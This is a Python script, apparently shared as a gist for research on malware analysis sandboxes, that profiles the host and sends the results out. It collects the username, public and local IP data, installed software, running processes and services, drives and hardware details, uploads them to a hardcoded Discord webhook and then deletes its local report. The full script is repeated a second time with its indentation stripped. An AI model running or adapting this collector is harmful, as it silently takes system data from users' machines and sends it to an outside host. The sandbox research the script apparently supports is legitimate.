benheise/sandbox-env-stealer.py

## sandbox-env-stealer.py
#################################################################################
#                                                                               #
# Refer to this blog post about what this code is used for:                     #
#  https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html             #
#                                                                               #
#################################################################################

import requests
import os
import psutil
import platform
import subprocess
import socket
from discord_webhook import DiscordWebhook
import getpass
import json
from uuid import getnode as get_mac
from collections import namedtuple
from ctypes import byref, create_unicode_buffer, windll
from ctypes.wintypes import DWORD
from itertools import count
from datetime import datetime
import atexit
import cpuinfo # pip install py-cpuinfo
import time
startTime = datetime.now()

##########################################################################################################

# defined at http://msdn.microsoft.com/en-us/library/aa370101(v=VS.85).aspx
UID_BUFFER_SIZE = 39
PROPERTY_BUFFER_SIZE = 256
ERROR_MORE_DATA = 234
ERROR_INVALID_PARAMETER = 87
ERROR_SUCCESS = 0
ERROR_NO_MORE_ITEMS = 259
ERROR_UNKNOWN_PRODUCT = 1605

# diff propoerties of a product, not all products have all properties
PRODUCT_PROPERTIES = [u'Language',
                      u'ProductName',
                      u'PackageCode',
                      u'Transforms',
                      u'AssignmentType',
                      u'PackageName',
                      u'InstalledProductName',
                      u'VersionString',
                      u'RegCompany',
                      u'RegOwner',
                      u'ProductID',
                      u'ProductIcon',
                      u'InstallLocation',
                      u'InstallSource',
                      u'InstallDate',
                      u'Publisher',
                      u'LocalPackage',
                      u'HelpLink',
                      u'HelpTelephone',
                      u'URLInfoAbout',
                      u'URLUpdateInfo',]
REPORT_FILENAME = 'report_VMP.json'
# class to be used for python users :)
Product = namedtuple('Product', PRODUCT_PROPERTIES)

def get_property_for_product(product, property, buf_size=PROPERTY_BUFFER_SIZE):
    property_buffer = create_unicode_buffer(buf_size)
    size = DWORD(buf_size)
    result = windll.msi.MsiGetProductInfoW(product, property, property_buffer,
                                           byref(size))
    if result == ERROR_MORE_DATA:
        return get_property_for_product(product, property,
                2 * buf_size)
    elif result == ERROR_SUCCESS:
        return property_buffer.value
    else:
        return None


def populate_product(uid):
    properties = []
    for property in PRODUCT_PROPERTIES:
        properties.append(get_property_for_product(uid, property))
    return Product(*properties)


def get_installed_products_uids():
    products = []
    for i in count(0):
        uid_buffer = create_unicode_buffer(UID_BUFFER_SIZE)
        result = windll.msi.MsiEnumProductsW(i, uid_buffer)
        if result == ERROR_NO_MORE_ITEMS:
            # done interating over the collection
            break
        products.append(uid_buffer.value)
    return products


def get_installed_products():
    products = []
    for puid in  get_installed_products_uids():
        products.append(populate_product(puid))
    return products


def is_product_installed_uid(uid):
    buf_size = 256
    uid_buffer = create_unicode_buffer(uid)
    property = u'VersionString'
    property_buffer = create_unicode_buffer(buf_size)
    size = DWORD(buf_size)
    result = windll.msi.MsiGetProductInfoW(uid_buffer, property, property_buffer,
                                           byref(size))
    if result == ERROR_UNKNOWN_PRODUCT:
        return False
    else:
        return True

def report_not_sent():
    if not report_sent:
        try:
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            outip = requests.get('https://api.ipify.org').text

            results = {
                "platform_system":platform.platform(),
                "platform_name":platform.node(),
                "platform_arch":platform.architecture(),
                "cpu_name":platform.processor(),
                "cpu_info":cpuinfo.get_cpu_info(),
                "num_cores":int(psutil.cpu_count()),
                "actor_pid":os.getpid(),
                "actor_login_username":os.getlogin(),
                "actor_username":username,
                "platform_path_env":os.get_exec_path(),
                "actor_working_dir":os.getcwd(),
                "machine_ip":requests.get('https://api.ipify.org').text,
                "machine_boot_time":psutil.boot_time(),
                "machine_local_time_epoch":str(time.time()),
                "machine_local_time":str(datetime.now()),
                "machine_ip":outip,
                "machine_cpu_util_ratios":psutil.cpu_times_percent(),
                "machine_cpu_stats":psutil.cpu_stats(),
                "machine_cpu_percent":psutil.cpu_percent(),
                "machine_net_addrs":psutil.net_if_addrs(),
                "machine_disk_partitions":psutil.disk_partitions(),
                "machine_disk_stats":psutil.disk_io_counters(),
                "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
                "cpuinfo":cpuinfo.get_cpu_info()
            }
            results['script_runtime'] = str(datetime.now() - startTime)

            with open('nice_sandbox.bro','w') as fin:
                json.dump(results,fin)

            with open("nice_sandbox.bro", "r") as f:
                webhook.add_file(file=f.read(), filename=REPORT_FILENAME)

            # print(results)
            webhook.execute()
        except:
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            webhook.content = "Failed execution for ip: %s (%s)" % (str(requests.get('https://api.ipify.org').text),str(platform.platform()))
            webhook.execute()


##########################################################################################################

webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
report_sent = False

if __name__ == '__main__':
    atexit.register(report_not_sent)

    if platform.system() == "Windows":
        ip = subprocess.check_output(["ipconfig"],encoding='utf8').strip()
        import win32api
        drives = win32api.GetLogicalDriveStrings()
        drives = drives.split('\000')[:-1]
        apps=get_installed_products()
    else:
        ip = subprocess.check_output(["ifconfig"],encoding='utf8').strip()
        drives = ["IDK-about-linux"]
        apps = ['IDK-about-linux']

    username = getpass.getuser()
    outip = requests.get('https://api.ipify.org').text

    results = {
        "platform_system":platform.platform(),
        "platform_name":platform.node(),
        "platform_arch":platform.architecture(),
        "cpu_name":platform.processor(),
        "cpu_info":cpuinfo.get_cpu_info(),
        "num_cores":int(psutil.cpu_count()),
        "actor_pid":os.getpid(),
        "actor_login_username":os.getlogin(),
        "actor_username":username,
        "actor_working_dir":os.getcwd(),
        "platform_path_env":os.get_exec_path(),
        "installed_sw":apps,
        "platform_ipconfig":str(ip),
        "machine_ip":outip,
        "cpu_stats":list([psutil.cpu_stats().ctx_switches,psutil.cpu_stats().interrupts, psutil.cpu_stats().soft_interrupts, psutil.cpu_stats().syscalls]),
        "machine_cpu_util_ratios":psutil.cpu_times_percent(),
        "machine_cpu_stats":psutil.cpu_stats(),
        "machine_cpu_percent":psutil.cpu_percent(),
        "machine_net_addrs":psutil.net_if_addrs(),
        "machine_disk_partitions":psutil.disk_partitions(),
        "machine_disk_stats":psutil.disk_io_counters(),
        "machine_disk0_usage":psutil.disk_usage(psutil.disk_partitions()[0].mountpoint),
        "machine_memory":psutil.virtual_memory(),
        "machine_battery":psutil.sensors_battery(),
        "machine_swap_memory":psutil.swap_memory(),
        "running_services":[s.as_dict() for s in psutil.win_service_iter()],
        "running_processes":[s.as_dict() for s in psutil.process_iter()],
        "machine_boot_time":psutil.boot_time(),
        "machine_local_time_epoch":str(time.time()),
        "machine_local_time":str(datetime.now()),
        "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
        "machine_drives":drives,
        "cpuinfo":cpuinfo.get_cpu_info()
    }
    results['script_runtime'] = str(datetime.now() - startTime)

    with open('nice_sandbox.bro','w') as fin:
        json.dump(results,fin)

    with open("nice_sandbox.bro", "r") as f:
        webhook.add_file(file=f.read(), filename=REPORT_FILENAME)

    # print(results)
    webhook.execute()
    report_sent = True
    os.remove('nice_sandbox.bro')
	#################################################################################
	# #
	# Refer to this blog post about what this code is used for: #
	# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html #
	# #
	#################################################################################

	import requests
	import os
	import psutil
	import platform
	import subprocess
	import socket
	from discord_webhook import DiscordWebhook
	import getpass
	import json
	from uuid import getnode as get_mac
	from collections import namedtuple
	from ctypes import byref, create_unicode_buffer, windll
	from ctypes.wintypes import DWORD
	from itertools import count
	from datetime import datetime
	import atexit
	import cpuinfo # pip install py-cpuinfo
	import time
	startTime = datetime.now()

	##########################################################################################################

	# defined at http://msdn.microsoft.com/en-us/library/aa370101(v=VS.85).aspx
	UID_BUFFER_SIZE = 39
	PROPERTY_BUFFER_SIZE = 256
	ERROR_MORE_DATA = 234
	ERROR_INVALID_PARAMETER = 87
	ERROR_SUCCESS = 0
	ERROR_NO_MORE_ITEMS = 259
	ERROR_UNKNOWN_PRODUCT = 1605

	# diff propoerties of a product, not all products have all properties
	PRODUCT_PROPERTIES = [u'Language',
	u'ProductName',
	u'PackageCode',
	u'Transforms',
	u'AssignmentType',
	u'PackageName',
	u'InstalledProductName',
	u'VersionString',
	u'RegCompany',
	u'RegOwner',
	u'ProductID',
	u'ProductIcon',
	u'InstallLocation',
	u'InstallSource',
	u'InstallDate',
	u'Publisher',
	u'LocalPackage',
	u'HelpLink',
	u'HelpTelephone',
	u'URLInfoAbout',
	u'URLUpdateInfo',]
	REPORT_FILENAME = 'report_VMP.json'
	# class to be used for python users :)
	Product = namedtuple('Product', PRODUCT_PROPERTIES)

	def get_property_for_product(product, property, buf_size=PROPERTY_BUFFER_SIZE):
	property_buffer = create_unicode_buffer(buf_size)
	size = DWORD(buf_size)
	result = windll.msi.MsiGetProductInfoW(product, property, property_buffer,
	byref(size))
	if result == ERROR_MORE_DATA:
	return get_property_for_product(product, property,
	2 * buf_size)
	elif result == ERROR_SUCCESS:
	return property_buffer.value
	else:
	return None


	def populate_product(uid):
	properties = []
	for property in PRODUCT_PROPERTIES:
	properties.append(get_property_for_product(uid, property))
	return Product(*properties)


	def get_installed_products_uids():
	products = []
	for i in count(0):
	uid_buffer = create_unicode_buffer(UID_BUFFER_SIZE)
	result = windll.msi.MsiEnumProductsW(i, uid_buffer)
	if result == ERROR_NO_MORE_ITEMS:
	# done interating over the collection
	break
	products.append(uid_buffer.value)
	return products


	def get_installed_products():
	products = []
	for puid in get_installed_products_uids():
	products.append(populate_product(puid))
	return products


	def is_product_installed_uid(uid):
	buf_size = 256
	uid_buffer = create_unicode_buffer(uid)
	property = u'VersionString'
	property_buffer = create_unicode_buffer(buf_size)
	size = DWORD(buf_size)
	result = windll.msi.MsiGetProductInfoW(uid_buffer, property, property_buffer,
	byref(size))
	if result == ERROR_UNKNOWN_PRODUCT:
	return False
	else:
	return True

	def report_not_sent():
	if not report_sent:
	try:
	webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
	outip = requests.get('https://api.ipify.org').text

	results = {
	"platform_system":platform.platform(),
	"platform_name":platform.node(),
	"platform_arch":platform.architecture(),
	"cpu_name":platform.processor(),
	"cpu_info":cpuinfo.get_cpu_info(),
	"num_cores":int(psutil.cpu_count()),
	"actor_pid":os.getpid(),
	"actor_login_username":os.getlogin(),
	"actor_username":username,
	"platform_path_env":os.get_exec_path(),
	"actor_working_dir":os.getcwd(),
	"machine_ip":requests.get('https://api.ipify.org').text,
	"machine_boot_time":psutil.boot_time(),
	"machine_local_time_epoch":str(time.time()),
	"machine_local_time":str(datetime.now()),
	"machine_ip":outip,
	"machine_cpu_util_ratios":psutil.cpu_times_percent(),
	"machine_cpu_stats":psutil.cpu_stats(),
	"machine_cpu_percent":psutil.cpu_percent(),
	"machine_net_addrs":psutil.net_if_addrs(),
	"machine_disk_partitions":psutil.disk_partitions(),
	"machine_disk_stats":psutil.disk_io_counters(),
	"internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
	"cpuinfo":cpuinfo.get_cpu_info()
	}
	results['script_runtime'] = str(datetime.now() - startTime)

	with open('nice_sandbox.bro','w') as fin:
	json.dump(results,fin)

	with open("nice_sandbox.bro", "r") as f:
	webhook.add_file(file=f.read(), filename=REPORT_FILENAME)

	# print(results)
	webhook.execute()
	except:
	webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
	webhook.content = "Failed execution for ip: %s (%s)" % (str(requests.get('https://api.ipify.org').text),str(platform.platform()))
	webhook.execute()



	##########################################################################################################

	webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
	report_sent = False

	if __name__ == '__main__':
	atexit.register(report_not_sent)

	if platform.system() == "Windows":
	ip = subprocess.check_output(["ipconfig"],encoding='utf8').strip()
	import win32api
	drives = win32api.GetLogicalDriveStrings()
	drives = drives.split('\000')[:-1]
	apps=get_installed_products()
	else:
	ip = subprocess.check_output(["ifconfig"],encoding='utf8').strip()
	drives = ["IDK-about-linux"]
	apps = ['IDK-about-linux']

	username = getpass.getuser()
	outip = requests.get('https://api.ipify.org').text

	results = {
	"platform_system":platform.platform(),
	"platform_name":platform.node(),
	"platform_arch":platform.architecture(),
	"cpu_name":platform.processor(),
	"cpu_info":cpuinfo.get_cpu_info(),
	"num_cores":int(psutil.cpu_count()),
	"actor_pid":os.getpid(),
	"actor_login_username":os.getlogin(),
	"actor_username":username,
	"actor_working_dir":os.getcwd(),
	"platform_path_env":os.get_exec_path(),
	"installed_sw":apps,
	"platform_ipconfig":str(ip),
	"machine_ip":outip,
	"cpu_stats":list([psutil.cpu_stats().ctx_switches,psutil.cpu_stats().interrupts, psutil.cpu_stats().soft_interrupts, psutil.cpu_stats().syscalls]),
	"machine_cpu_util_ratios":psutil.cpu_times_percent(),
	"machine_cpu_stats":psutil.cpu_stats(),
	"machine_cpu_percent":psutil.cpu_percent(),
	"machine_net_addrs":psutil.net_if_addrs(),
	"machine_disk_partitions":psutil.disk_partitions(),
	"machine_disk_stats":psutil.disk_io_counters(),
	"machine_disk0_usage":psutil.disk_usage(psutil.disk_partitions()[0].mountpoint),
	"machine_memory":psutil.virtual_memory(),
	"machine_battery":psutil.sensors_battery(),
	"machine_swap_memory":psutil.swap_memory(),
	"running_services":[s.as_dict() for s in psutil.win_service_iter()],
	"running_processes":[s.as_dict() for s in psutil.process_iter()],
	"machine_boot_time":psutil.boot_time(),
	"machine_local_time_epoch":str(time.time()),
	"machine_local_time":str(datetime.now()),
	"internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
	"machine_drives":drives,
	"cpuinfo":cpuinfo.get_cpu_info()
	}
	results['script_runtime'] = str(datetime.now() - startTime)

	with open('nice_sandbox.bro','w') as fin:
	json.dump(results,fin)

	with open("nice_sandbox.bro", "r") as f:
	webhook.add_file(file=f.read(), filename=REPORT_FILENAME)

	# print(results)
	webhook.execute()
	report_sent = True
	os.remove('nice_sandbox.bro')